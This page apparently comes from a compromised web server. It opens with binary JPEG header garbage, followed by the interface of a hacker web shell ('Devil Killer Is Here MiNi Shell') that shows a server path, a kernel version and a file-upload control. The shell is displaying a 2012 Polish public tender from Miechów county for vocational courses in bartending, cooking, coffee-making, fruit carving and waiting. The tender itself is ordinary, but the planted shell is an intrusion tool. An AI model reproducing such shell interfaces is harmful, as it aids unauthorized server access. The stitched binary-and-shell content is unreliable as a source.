JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/457720-N-2012.html

<p class="kh_header"><b>Miechów: ORGANIZACJA I PRZEPROWADZENIE KURSÓW W RAMACH PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO W MAŁOPOLSCE</b><br>
<b>Numer ogłoszenia: 457720 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Miechowie , ul. Racławicka 12, 32-200 Miechów, woj. małopolskie, tel. 041 3821110, faks 041 3821118.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA I PRZEPROWADZENIE KURSÓW W RAMACH PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO W MAŁOPOLSCE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:

Zamówienie składa się z 5 części
CZĘŚĆ I Kurs barmański 
CZĘŚĆ II:Kurs gastronomiczny 
CZĘŚĆ III Kurs baristyczny (parzenia kawy) 
CZĘŚĆ IVKurs carvingu (rzeźbienia w owocach i warzywach) 
CZĘŚĆ VKurs kelnerski 

Uczestnikami kursów będą uczniowie szkół zawodowych z terenu powiatu miechowskiego, będący jednocześnie uczestnikami projektu Modernizacja Kształcenia Zawodowego w Małopolsce.

CZĘŚĆ I: Kurs barmański 

1. Liczba uczestników: 15 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: 50, w tym minimum 40 godzin zajęć praktycznych
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności związane z pracą barmana, w szczególności z zakresu:
1) Wprowadzenie i terminologia: barman jako zawód; barmańskie savoir-vivre; praca z klientem; barman szefem lokalu.
2)  Bar jako miejsce pracy. Alkohol jako używka albo atrybut kultury: podział na typy barów; umeblowanie i wyposażenie, aranżacja; wyposażenie podręczne; podział alkoholi: piwo, wino, wódki białe i gatunkowe, brandy, koniak, likiery, whisky; aperitif, digestif; wpływ alkoholu na organizm człowieka.
3) Podstawy miksologii: cocktaile, rodzaje drinków long, short i inne; drinki światowe i lokalne; dodatki, składniki dekoracyjne; szkło barowe, miary, dodatki uzupełniające.
4)  Nauka sporządzania wybranych drinków.
5)   Kawa w barze. Nauka sporządzania drinków na bazie kawy: ekspres do kawy ciśnieniowy zasady parzenia i serwowania kawy; drinki na bazie kawy nauka sporządzania wybranych drinków.
6)  Free style:  czym jest free style zasady i techniki free style; pokaz free style.
4. Miejscem organizacji zajęć może być Zespół Szkół Nr 1 w Miechowie. W przypadku ustalenia miejsca prowadzenia zajęć poza Miechowem, Wykonawca zapewnia transport uczestników kursu oraz ponosi wszelkie koszty z tym związane.
5. Wykonawca zapewni materiał dydaktyczny dla każdego uczestnika kursu. Każdy uczestnik kursu powinien wykonać odrębnie minimum 20 drinków, w tym 10 alkoholowych. 
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
11. Termin wykonania zamówienia: do 20.01.2013 roku.

CZĘŚĆ II: Kurs gastronomiczny 

1. Liczba uczestników 15 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć 50, w tym minimum 40 godzin zajęć praktycznych
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności dotyczące zasad żywienia, przepisów kulinarnych, organizacji produkcji różnych potraw, w szczególności z zakresu
1) Sporządzanie potraw z warzyw Zastosowanie warzyw i owoców w gastronomii; Technika sporządzania surówek sezonowych Technika sporządzania sałatek jarzynowych Sporządzanie bukietu z warzyw Technika dekorowania i serwowania potraw z warzyw.
2) Sporządzanie potraw z jaj i przetworów mleczarskich: Sporządzanie koreczków serowych Sporządzanie chłodników; Desery i napoje z przetworów mleczarskich; Przygotowanie potraw z jaj gotowanych Technika sporządzania jaj faszerowanych; Sporządzanie potraw z jaj smażonych Technika sporządzania jaj nadziewanych; Technika sporządzania kotlecików z jaj Technika sporządzania zakąsek z jaj.
3) Sporządzanie zup: Technika wykonania zup kremowych; Sposoby zagęszczania zup kremowych Etapy sporządzania zup zagęszczanych; Sporządzanie zup zagęszczanych składnikiem skrobiowym; Sporządzanie zup zagęszczanych zawiesiną Sporządzanie zup zagęszczanych zasmażką Dodatki stosowane do zup czystych i zagęszczanych; Porcjowanie i podawanie zup czystych i kremowych; Porcjowanie i podawanie zup zagęszczanych; Technika sporządzania sosów na gorąco.
4) Sporządzanie potraw mącznych: Obróbka wstępna składników ciasta; Rodzaje ciast wyrabianych w naczyniu; Sporządzanie ciast zarabianych w naczyniu; Zastosowanie ciast gotowanych i smażonych Ciasta wyrabiane na stolnicy; Rodzaje dodatków i sposoby formowania wyrobów Przygotowanie pierogów i ich gotowanie; Technika sporządzania kołdunów i uszek Techniki sporządzania ciast kruchych i półkruchych;
5) Zastosowanie potraw jarskich i półmięsnych w gastronomii: Sposoby podawania potraw jarskich i półmięsnych; Zastosowanie potraw jarskich i półmięsnych w gastronomii; Potrawy półmięsne gotowane; Potrawy półmięsne smażone i duszone; Potrawy półmięsne zapiekane.
6) Potrawy z drobiu Przygotowanie drobiu do obróbki wstępnej i cieplnej Podstawowe i dodatkowe składniki drobiowej masy mielonej; Asortyment potraw smażonych z drobiu i stosowanych dodatków Asortyment potraw pieczonych z drobiu i stosowanych dodatków; Asortyment potraw grillowanych z drobiu i stosowanych dodatków.
7) Potrawy z ryb Asortyment potraw z ryb Normatyw surowców na potrawy z ryb; Obróbka wstępna; Sporządzanie drobiowej masy mielonej i formowanie półproduktów; Techniki obróbki.
8) Sporządzanie przekąsek zimnych i gorących: Techniki sporządzania sosów zimnych; Sporządzanie różnych typów kanapek; Sporządzanie przekąsek gorących; Sporządzanie przekąsek zimnych ze szczególnym uwzględnieniem sposobu podawania i dekoracji Przygotowanie zimnego bufetu sposoby ustawiania napojów, przekąsek i dodatków.
4. Miejscem organizacji szkolenia będzie Zespół Szkół Nr 1 w Miechowie ul. Sobieskiego 8.
5. Wykonawca zobowiązany jest do prowadzenia zajęć na użyczonym sprzęcie, zakupionym dla Zespołu Szkół Nr 1 w Miechowie ze środków projektu. W przypadku, gdy sprzęt ten nie będzie wystarczający do zrealizowania programu kursu, Wykonawca zapewni pozostały niezbędny sprzęt szkoleniowy..
6. Wykonawca zobowiązany jest do zapewnienia materiału dydaktycznego, teoretycznego i praktycznego, w tym surowców do wykonania potraw. Kwota przeznaczona na surowce na jedną pięcioosobową grupę uczestników kursu nie może być niższa niż 600 zł (sześćset zł).
7. Wykonawca zobowiązany jest do zapewnienia preparatów myjących, czyszczących oraz innych niezbędnych do prawidłowego funkcjonowania urządzeń wykorzystywanych w trakcie zajęć.
8. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
9. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
10. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
11. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
12. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
13. Termin wykonania zamówienia: do 20.01.2013 roku.

CZĘŚĆ III: Kurs baristyczny (parzenia kawy) 

1. Liczba uczestników: 20 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 12 godz. w tym minimum 8 godz. zajęć praktycznych.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności w szczególności z zakresu:
1)  Część teoretyczna: Podstawowe informacje o kawie czyli Coffee Culture:uprawa kawy, metody jej pozyskiwania, transport i przechowywanie, jakość ziarna, prażenie, cechy organoleptyczne; Ekspres do parzenia kawy typu Espresso budowa urządzenia, zasady pracy przy ekspresie - teoria i praktyka, młynek do kawy - budowa, sposób ustawienia, grubość mielenia, porcja na 1 espresso; Espresso: zasady dobrego espresso, reguła 4m, błędy przy parzeniu espresso, mleko - rodzaj mleka, sposoby spieniania, rodzaje kaw na bazie espresso, parzenie kawy w ekspresie ciśnieniowym - omówienie kolejnych czynności
2) Część praktyczna: Espresso: przygotowanie ekspresu do pracy, ustawienie młynka do kawy, dozowanie kawy, ubijanie kawy, etapy przygotowania espresso, rozpoznawanie źle przygotowanego espresso, kończenie pracy na ekspresie, czyszczenie i konserwacja ekspresu; Napoje kawowe na bazie espresso: przyrządy i dodatki stosowane do napojów kawowych niezbędne do pracy z ekspresem, spienianie mleka, dobór filiżanek, podstawowe napoje na bazie espresso (cappuccino, macchiatto, latte), latte art - sztuka zdobienia kawy, inne napoje na bazie espresso ( z użycie syropów, sosów, lodów, bitej śmietany itp.); Dbałość o stanowisko pracy: konserwacja i czyszczenie ekspresu, konserwacja i czyszczenie młynka, postępowanie z kawą (przechowywanie, dozowanie)
4. Miejscem organizacji szkolenia będzie Zespół Szkół Nr 2 w Miechowie, ul. B. Prusa 2. 
5. Wykonawca zapewni swój sprzęt szkoleniowy oraz materiał dydaktyczny dla każdego uczestnika kursu. Kwota przeznaczona na materiał dydaktyczny do zajęć praktycznych na 1 uczestnika kursu nie może być niższa niż 40 zł (czterdzieści zł).
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i/lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
11. Termin wykonania zamówienia: do 20.01.2013 roku.

CZĘŚĆ IV: Kurs carvingu (rzeźbienia w owocach i warzywach) 

1. Liczba uczestników: 10 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 12 godz. w tym minimum 8 godz. zajęć praktycznych.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności w szczególności z zakresu:
1) Część teoretyczna: zasady bezpieczeństwa podczas pracy z ostrymi narzędziami; przeznaczenie każdego narzędzia do zdobienia warzyw i owoców; podstawowe techniki rzeźbienia i zasady, jakie powinno się stosować przy wykrawaniu warzyw i owoców; sposoby przechowywania i eksponowania kompozycji; techniki wycinania kwiatów, liści i innych ozdób w dużych owocach i warzywach; szczegółowy opis czynności i technik potrzebnych do wykonania pierwszej rzeźby.
2) Część praktyczna: podstawowe cięcia; wycinanie liści i kwiatów z różnych warzyw i owoców; utworzenie kompozycji z wykonanych elementów; wycinanie bukietów kwiatowych w dyni i melonie lub arbuzie wg wskazań instruktora; wykonywanie własnych aranżacji; technika, sposoby oraz możliwościami zastosowania carvingu w praktyce.
4. Miejscem organizacji szkolenia będzie Zespół Szkół Nr 2 w Miechowie, ul. B. Prusa 2. 
5. Wykonawca zapewni swój sprzęt szkoleniowy oraz materiał dydaktyczny dla każdego uczestnika kursu. 
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w  sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wszystkie dokumenty i materiały szkoleniowe, listy obecności oraz miejsce prowadzenia szkolenia muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
11. Termin wykonania zamówienia: do 20.01.2013 roku.

CZĘŚĆ V: Kurs kelnerski 

1. Liczba uczestników: 29 uczniów, podzielonych na 2 grupy. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 40 godz. w tym minimum 20 godz. zajęć praktycznych.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności w szczególności z zakresu:
obsługi kelnerskiej gości, savoir vivre, nakrywania do stołu, serwowania potraw i napojów, 
organizowania różnych form przyjęć i bankietów, przygotowania sali konsumenckiej do obsługi, technik noszenia naczyń, systemu rozliczeń kelnerskich.
4. Miejscem organizacji szkolenia będzie: Zespół Szkół Nr 2 w Miechowie, ul. B. Prusa 2 - dla grupy 20 uczniów oraz Specjalny Ośrodek Szkolno-Wychowawczy w Zagorzycach k. Miechowa - dla grupy 9 uczniów.  Wykonawca zobowiązany jest do zapewnienia kadry w taki sposób aby obydwie grupy mogły mieć kurs w tym samym czasie, t.j. minimum 2 osoby szkolące. 
5. Wykonawca zapewni swój sprzęt szkoleniowy oraz materiał dydaktyczny dla każdego uczestnika kursu.
6. Zajęcia mogą odbywać się w godzinach popołudniowych od poniedziałku do piątku oraz przedpołudniowych w sobotę i lub w niedzielę, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
7. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu.
8. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
9. Wykonawca zobowiązany będzie po ukończeniu kursu powinien przeprowadzić egzamin wewnętrzny sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
10. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
11. Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia szkolenia i listy obecności muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
12. Termin wykonania zamówienia: do 20.01.2013 roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany wzór istotnych postanowień umowy
wpis do Instytucji Szkoleniowych  lub Akredytację Kuratorium Oświaty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miechow.pl (BIP) zamawiającego<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Miechowie
ul.Racławicka 12
32-200 Miechów
pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2012 godzina 11:00, miejsce: Starostwo Powiatowe w Miechowie
ul.Racławicka 12
32-200 Miechów
sekretariat zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> priorytet IX Działanie 9.2 POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs barmański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników 15 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć 50, w tym minimum 40 godzin zajęć praktycznych
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności związane z pracą barmana, w szczególności z zakresu:
1) Wprowadzenie i terminologia: barman jako zawód; barmańskie savoir-vivre; praca z klientem; barman szefem lokalu.
2)  Bar jako miejsce pracy. Alkohol jako używka albo atrybut kultury: podział na typy barów; umeblowanie i wyposażenie, aranżacja; wyposażenie podręczne; podział alkoholi: piwo, wino, wódki białe i gatunkowe, brandy, koniak, likiery, whisky; aperitif, digestif; wpływ alkoholu na organizm człowieka.
3) Podstawy miksologii: cocktaile, rodzaje drinków: long, short i inne; drinki światowe i lokalne; dodatki, składniki dekoracyjne; szkło barowe, miary, dodatki uzupełniające.
4)  Nauka sporządzania wybranych drinków.
5)   Kawa w barze. Nauka sporządzania drinków na bazie kawy: ekspres do kawy ciśnieniowy; zasady parzenia i serwowania kawy; drinki na bazie kawy; nauka sporządzania wybranych drinków.
6)  Free style:  czym jest free style zasady i techniki free style; pokaz free style.
4. Miejscem organizacji zajęć może być Zespół Szkół Nr 1 w Miechowie. W przypadku ustalenia miejsca prowadzenia zajęć poza Miechowem, Wykonawca zapewnia transport uczestników kursu oraz ponosi wszelkie koszty z tym związane.
5. Wykonawca zapewni materiał dydaktyczny dla każdego uczestnika kursu. Każdy uczestnik kursu powinien wykonać odrębnie minimum 20 drinków, w tym 10 alkoholowych. 
